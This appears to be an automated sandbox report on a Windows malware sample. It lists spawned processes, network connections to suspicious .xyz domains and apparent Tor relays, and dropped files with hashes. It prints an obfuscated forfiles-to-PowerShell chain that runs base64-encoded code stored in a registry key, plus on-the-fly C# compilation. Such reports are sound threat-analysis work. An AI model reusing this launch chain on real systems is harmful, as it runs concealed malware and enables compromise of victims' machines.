C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:82958 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:82962 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:17412 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:82968 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:82972 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:82976 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:82980 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:82984 /prefetch:2

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /min forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBhAGMAYwBvAG4AJwApAC4ATQA= & exit" /p C:\Windows\system32 /s /m po*l.e*e

C:\Windows\system32\forfiles.exe

forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBhAGMAYwBvAG4AJwApAC4ATQA= & exit" /p C:\Windows\system32 /s /m po*l.e*e

C:\Windows\system32\cmd.exe

/k "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBhAGMAYwBvAG4AJwApAC4ATQA= & exit

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBhAGMAYwBvAG4AJwApAC4ATQA=

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAG8AdgB0AHMAbAB5ACkAOwBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABvAHYAdABzAGwAeQApACcA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApADsAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApACcA

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yduppq40\yduppq40.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD4FC.tmp" "c:\Users\Admin\AppData\Local\Temp\yduppq40\CSC1C2BCD08D0674F4EBB14B4F82C2728A0.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gkonnpn0\gkonnpn0.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD692.tmp" "c:\Users\Admin\AppData\Local\Temp\gkonnpn0\CSCFBE45FDC2F347C08385E222A1869041.TMP"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 444 -ip 444

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 444 -s 624

Network

Country Destination Domain Proto
US 8.8.8.8:53 licensing.mp.microsoft.com udp
US 20.223.25.224:443 licensing.mp.microsoft.com tcp
US 8.8.8.8:53 storesdk.dsx.mp.microsoft.com udp
NL 104.80.225.205:443 storesdk.dsx.mp.microsoft.com tcp
US 20.223.25.224:443 licensing.mp.microsoft.com tcp
US 20.223.25.224:443 licensing.mp.microsoft.com tcp
US 8.8.8.8:53 gogojoob.xyz udp
NL 194.104.136.213:443 gogojoob.xyz tcp
NL 194.104.136.213:443 gogojoob.xyz tcp
NL 194.104.136.213:443 gogojoob.xyz tcp
NL 194.104.136.213:443 gogojoob.xyz tcp
NL 194.104.136.213:443 gogojoob.xyz tcp
US 8.8.8.8:53 licensing.mp.microsoft.com udp
US 20.223.25.224:443 licensing.mp.microsoft.com tcp
NL 194.104.136.213:443 gogojoob.xyz tcp
NL 194.104.136.213:443 gogojoob.xyz tcp
NL 194.104.136.213:443 gogojoob.xyz tcp
NL 194.104.136.213:443 gogojoob.xyz tcp
NL 194.104.136.213:443 gogojoob.xyz tcp
NL 194.104.136.213:443 gogojoob.xyz tcp
NL 194.104.136.213:443 gogojoob.xyz tcp
NL 194.104.136.213:443 gogojoob.xyz tcp
GB 91.244.181.85:443 tcp
AT 193.80.211.63:8080 tcp
NL 45.137.184.31:80 45.137.184.31 tcp
FR 62.210.137.233:443 62.210.137.233 tcp
RO 89.34.27.237:9030 89.34.27.237 tcp
FR 62.210.137.233:443 62.210.137.233 tcp
US 199.249.230.117:80 199.249.230.117 tcp
RO 89.34.27.237:9030 89.34.27.237 tcp
HK 91.245.255.40:80 91.245.255.40 tcp
DE 45.14.233.149:80 45.14.233.149 tcp
GB 139.162.210.252:80 139.162.210.252 tcp
US 199.249.230.82:80 199.249.230.82 tcp
DE 45.14.233.149:80 45.14.233.149 tcp
US 199.249.230.117:80 199.249.230.117 tcp
US 199.249.230.82:80 199.249.230.82 tcp
GB 82.69.47.114:9030 82.69.47.114 tcp
DE 185.117.215.9:80 185.117.215.9 tcp
US 8.8.8.8:53 unavas.xyz udp
US 8.8.8.8:53 microsoft.com udp
NL 91.242.229.120:443 unavas.xyz tcp
US 45.61.185.53:80 45.61.185.53 tcp
RO 89.34.27.237:9030 89.34.27.237 tcp
SE 83.226.182.52:8080 83.226.182.52 tcp
US 209.250.2.254:80 209.250.2.254 tcp
HK 91.245.255.40:80 91.245.255.40 tcp
DE 138.201.169.12:80 138.201.169.12 tcp
PL 82.118.21.102:80 82.118.21.102 tcp
US 199.249.230.66:80 199.249.230.66 tcp
DE 92.222.79.186:80 92.222.79.186 tcp
CA 199.58.81.140:80 199.58.81.140 tcp
US 199.249.230.82:80 199.249.230.82 tcp
DE 84.158.119.183:9030 84.158.119.183 tcp
US 199.249.230.74:80 199.249.230.74 tcp
US 199.249.230.176:80 199.249.230.176 tcp
ID 139.99.46.190:9030 139.99.46.190 tcp
DE 77.23.199.118:9030 77.23.199.118 tcp
NL 188.226.222.19:80 188.226.222.19 tcp
DE 90.186.84.208:8080 90.186.84.208 tcp
TW 118.163.74.160:80 118.163.74.160 tcp
US 199.249.230.82:80 199.249.230.82 tcp
ZA 160.119.249.240:80 160.119.249.240 tcp
US 199.249.230.173:80 199.249.230.173 tcp
AT 86.59.21.38:80 86.59.21.38 tcp
JP 182.169.28.173:80 182.169.28.173 tcp
UA 95.67.38.55:9030 95.67.38.55 tcp
US 185.220.103.112:80 185.220.103.112 tcp
US 8.8.8.8:53 curlmyip.net udp
FI 135.181.84.242:80 curlmyip.net tcp
AT 37.252.185.87:80 37.252.185.87 tcp
CR 200.122.181.78:80 200.122.181.78 tcp
US 199.249.230.176:80 199.249.230.176 tcp
DE 45.14.233.159:80 45.14.233.159 tcp
US 38.147.122.254:80 38.147.122.254 tcp
NL 91.242.229.120:443 unavas.xyz tcp
US 38.147.122.252:80 38.147.122.252 tcp
US 99.149.215.67:80 99.149.215.67 tcp
CR 200.122.181.101:80 200.122.181.101 tcp
CL 170.239.86.145:80 170.239.86.145 tcp
DE 178.254.35.99:80 178.254.35.99 tcp
FR 62.210.205.228:80 62.210.205.228 tcp
US 199.249.230.176:80 199.249.230.176 tcp
US 154.35.175.225:80 154.35.175.225 tcp
US 199.249.230.142:80 199.249.230.142 tcp
NL 5.2.72.226:80 5.2.72.226 tcp
MY 124.217.246.98:80 124.217.246.98 tcp
VN 125.212.217.197:80 125.212.217.197 tcp
DE 178.254.35.99:80 178.254.35.99 tcp
US 199.249.230.82:80 199.249.230.82 tcp
US 199.249.230.66:80 199.249.230.66 tcp
PL 192.166.245.158:80 192.166.245.158 tcp
US 199.249.230.73:80 199.249.230.73 tcp
DE 185.216.179.206:80 185.216.179.206 tcp
US 199.249.230.150:80 199.249.230.150 tcp
US 199.249.230.70:80 199.249.230.70 tcp
BE 45.128.133.206:80 45.128.133.206 tcp
SE 193.189.100.203:80 193.189.100.203 tcp
FR 163.172.94.144:9030 163.172.94.144 tcp
LU 104.244.73.126:80 104.244.73.126 tcp
US 199.249.230.77:80 199.249.230.77 tcp
FR 5.39.73.41:80 5.39.73.41 tcp
FR 92.243.29.88:80 92.243.29.88 tcp
SE 153.92.126.234:80 153.92.126.234 tcp
US 199.249.230.143:80 199.249.230.143 tcp
DE 178.254.9.25:80 178.254.9.25 tcp
PL 51.83.129.245:80 tcp
US 199.249.230.84:80 199.249.230.84 tcp
SE 193.189.100.203:80 tcp
NL 5.2.72.226:80 tcp

Files

memory/444-134-0x00000000005CE000-0x00000000005DA000-memory.dmp

memory/444-135-0x00000000005CE000-0x00000000005DA000-memory.dmp

memory/444-136-0x0000000000590000-0x000000000059C000-memory.dmp

memory/444-137-0x0000000001000000-0x000000000106F000-memory.dmp

memory/444-138-0x00000000005A0000-0x00000000005B0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\2psodd8\imagestore.dat

MD5 b07c239f418299f3b983557b171e5523
SHA1 f13960edf84337c30db5ed9b48a0aaea2ffe1805
SHA256 bc0ac00d36dedbf66b153395c9f6830e9a558c5112d2c286119a507323ed7709
SHA512 a37aa264a0bbea2a76c7b255baf335451d7188cb4d4a0d45c1cb725ca19cb6dd49cce18cf654eb55b3e32e79d1b0db7ea75636640dddf93ceb522975c02af6e6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5 54e9306f95f32e50ccd58af19753d929
SHA1 eab9457321f34d4dcf7d4a0ac83edc9131bf7c57
SHA256 45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72
SHA512 8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5 6bc51132df2990f83cad1b18f7095383
SHA1 2b684fadcf445317566482e19b2ce050be5d1a45
SHA256 d77fc617d7f398c54bd8d11afaeb07315ce12db06bc9ed5a7195fbb6d4c19c39
SHA512 d81f094ef9b22925679779af522015684c0953fb433ce6f77202760da22870aa163c33e7274e3284685b2f030de381e80197a9bf697cf966608d701dbe728431

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\558DW1ID\favicon[1].ico

MD5 a976d227e5d1dcf62f5f7e623211dd1b
SHA1 a2a9dc1abdd3d888484678663928cb024c359ee6
SHA256 66332859bd8e3441a019e073a318b62a47014ba244121301034b510dc7532271
SHA512 6754d545f2ce095cfa1fa7ca9e3223f89e37726ee7e541ebcf3e209e18b2602f3be8677598cb30d697327a63de032c11dbf8ef7ad7889a79c488a21044c1cb3f

memory/1276-148-0x00000244DF5E0000-0x00000244DF602000-memory.dmp

memory/4644-150-0x00007FFDF9760000-0x00007FFDFA221000-memory.dmp

memory/1276-151-0x00000244F8F20000-0x00000244F8F22000-memory.dmp

memory/1276-149-0x00007FFDF9760000-0x00007FFDFA221000-memory.dmp

memory/1276-152-0x00000244F8F23000-0x00000244F8F25000-memory.dmp

memory/1276-153-0x00000244F8F26000-0x00000244F8F28000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/2752-155-0x00007FFDF9760000-0x00007FFDFA221000-memory.dmp

memory/2752-156-0x00000239B67B0000-0x00000239B67B2000-memory.dmp

memory/2752-157-0x00000239B67B3000-0x00000239B67B5000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 feadc4e1a70c13480ef147aca0c47bc0
SHA1 d7a5084c93842a290b24dacec0cd3904c2266819
SHA256 5b4f1fe7ba74b245b6368dbe4ceffa438f14eef08ba270e9a13c57505c7717ac
SHA512 c9681a19c773891808fefa9445cea598d118c83bba89530a51ab993adbff39bce72b43f8e99d0c68e4a44f7e0f4c8ec128641c45cd557a8e1215721d5d992a23

\??\c:\Users\Admin\AppData\Local\Temp\yduppq40\yduppq40.cmdline

MD5 d9b84d1bedd2ddccb9eff29469b5ca23
SHA1 4a008025e90fdb0b71a4bfdb2244f78521f9616f
SHA256 ca5719fd89f44f57a5d84fcb69c6187f8246826dafe9b424bfa668616df04d68
SHA512 a85673dc719f1a40a682bf20bbc28d897fba1789e6a7c9442cd67c2389285ae000b4e9d435cc8a8483fe4e3185b366c97e4d45f384a3bdd2868ab328c02a6c04

\??\c:\Users\Admin\AppData\Local\Temp\yduppq40\yduppq40.0.cs

MD5 7fceb996f934e8bda687cdd2bd46a9a7
SHA1 81e1edbcca6438daaccc3845fa0e3b1a6cff17a6
SHA256 fa53f8174510a9ad008973d47798f022b681e1764a15134efd2004980f23bb6e
SHA512 6aa6253527b72c0605859180887ff19cd96412cb816ec02e832d4a0e0cbcd03d9cc580112e4e2055d4a9ede850c1a339df974371f992b0b9b73e54e137610205

\??\c:\Users\Admin\AppData\Local\Temp\yduppq40\CSC1C2BCD08D0674F4EBB14B4F82C2728A0.TMP

MD5 a71a02ee123c1527fbf22cf4d5f4bbcd
SHA1 d06066ba2b5b2e4fab8b2525256101107bbea75d
SHA256 da37e4a2f0448cc7b1d5838c84de8d9d8c97ce30ae78a8563b3cbb512d40a4e2
SHA512 0316e4f51b4b2fb663a6457f0fc5510401738a3a82588f732cb41bff497371b82200d9a3a6ced1b3fce1976b09a5ffe51e2ccd792a6f04df4f284d6d3a936ab1

C:\Users\Admin\AppData\Local\Temp\RESD4FC.tmp

MD5 18d385382c9cef05ab2fb59ef2179f38
SHA1 34a8a72dac898afcccec131c6485c0b664a65bf9
SHA256 552e55b48034a4d0372ab19987b01324fe8de4abc48df19f28189912dbb78b1e
SHA512 af68a99b9f31c3339c53a03288c3501ab4f540673572e3fd62ba4f0023fc9c1d8b0c7272acd3c2ec17368cf7748f2aef95203f93f4cefa04c1e4153f6ab917b7

C:\Users\Admin\AppData\Local\Temp\yduppq40\yduppq40.dll

MD5 c7e0ce7c250bc52d8ed97a410cfa8ab4
SHA1 1282eba2b5e561dc1b26ba24fa7ce8b744edfea9
SHA256 339b677126b8d37d50f246811595f9915f1f6588618f4cba03265eeb245b4834
SHA512 c18e1536068463ce6ce8edc5804f1b653f9adfb3b8e7382fa86814891abb09c84eb7051d4c13c4b06a1623747cbdf3aa3ecb284eecc199d38c173bb82390467d

\??\c:\Users\Admin\AppData\Local\Temp\gkonnpn0\gkonnpn0.cmdline

MD5 108e007a6ad4048d2b446eff65bd71e8
SHA1 ecc2f4d2491aae9d083b9e69bc77fbed5249c007
SHA256 adeaf88bb60f5dc7d3a24e0a78b2f7398e5c2e7834a7c1e476add0fc12bdbba8
SHA512 49671fbc673d147f0c76cca350207db8b0bf0a0d8ba2fa966a8c9614d808417db298df163ce6bc51d03d1c94d4b95c7a0e30a8f91c23bccf5a3e41c5ae9899e1

\??\c:\Users\Admin\AppData\Local\Temp\gkonnpn0\gkonnpn0.0.cs

MD5 697f16b8c6892082559d8a17db343865
SHA1 246d6ba1419478be7915e78b61525da894321fb9
SHA256 518ab091348dea4f49183958185b3d42b5ddb191007bab25b6e69ff6ec923f1f
SHA512 801a428c5dd5ff4a745923914505dcf5a9929b3dbfc5bb5f6320996ad849fa42dc75ac53a432dd01103e0d6db2269583351f14b189a76a066d6f940ff79d38d6

\??\c:\Users\Admin\AppData\Local\Temp\gkonnpn0\CSCFBE45FDC2F347C08385E222A1869041.TMP

MD5 0829765fc0fea14feccd7f9aee983897
SHA1 5a35f111e627591248ce26d1e15ecacf57465f1b
SHA256 5136e1c6b8a9c1e866fc944d35db273608866cb042179087b92779c0498b0bfd
SHA512 d7e9633e68ac5d16ac2b666f360ae6be5ace4f6a1bb7d67a6668ef113342cc2acb8aab3ce910b6e798e0a2a72828ba783a675b1597217b1125b631549b1099e9

C:\Users\Admin\AppData\Local\Temp\RESD692.tmp

MD5 98090b034d332c533789e4435166c7d3
SHA1 19af81eccc15398b6f3825763d8c38b27a76ff31
SHA256 d4f30f15368d279f471981b8c03ba05d185a4414241b22e9496e86360a56fde4
SHA512 b8d7d8456530b94f9aa4d48fd582755afd2e24be7156d4a8a318ade843d9f5cc82dada745c3ccf97cf444f1cb78b0c4a4f06109c1bc719fd3e293ef25cf9a644

C:\Users\Admin\AppData\Local\Temp\gkonnpn0\gkonnpn0.dll

MD5 08639db717fd568cbbf83b8951853e0a
SHA1 759dfe3cbefcec767c301fa33af3fd1b3c1ba5d4
SHA256 5ae518ed2a7f968060731bc62e8893ba69756dfc9f489f99485e6b08e3e29f23
SHA512 741724a30ba70ad65eeed822a4d40d634b33e15072a2ce6ab8dbcac2863b310f231a1f5bb817af83c10b6442790cecba13c760098792e4c1a2fb8091026eba60

memory/1276-169-0x00000244F8EB0000-0x00000244F8EC3000-memory.dmp

memory/444-170-0x00000000001C0000-0x00000000001CE000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9856eec246073417aba7c4e517d16d0b
SHA1 ce495a8b86044e11eaf50cc89a92116cc9b13724
SHA256 0ed72f3f9a4847fc67fe0d6dc44d1773b8a652aaaf84352440b44da59a66d7f8
SHA512 8227671cae6eb7e5d2f77e82656c9099efb0e59b9478a7884216e83bc2be8c11ae2cbdea1c9137da263825c3a8357321fc5c931841020596cdd82ca42489f16e

memory/2996-172-0x0000000000B00000-0x0000000000B15000-memory.dmp

memory/2996-173-0x0000000007F50000-0x0000000007F65000-memory.dmp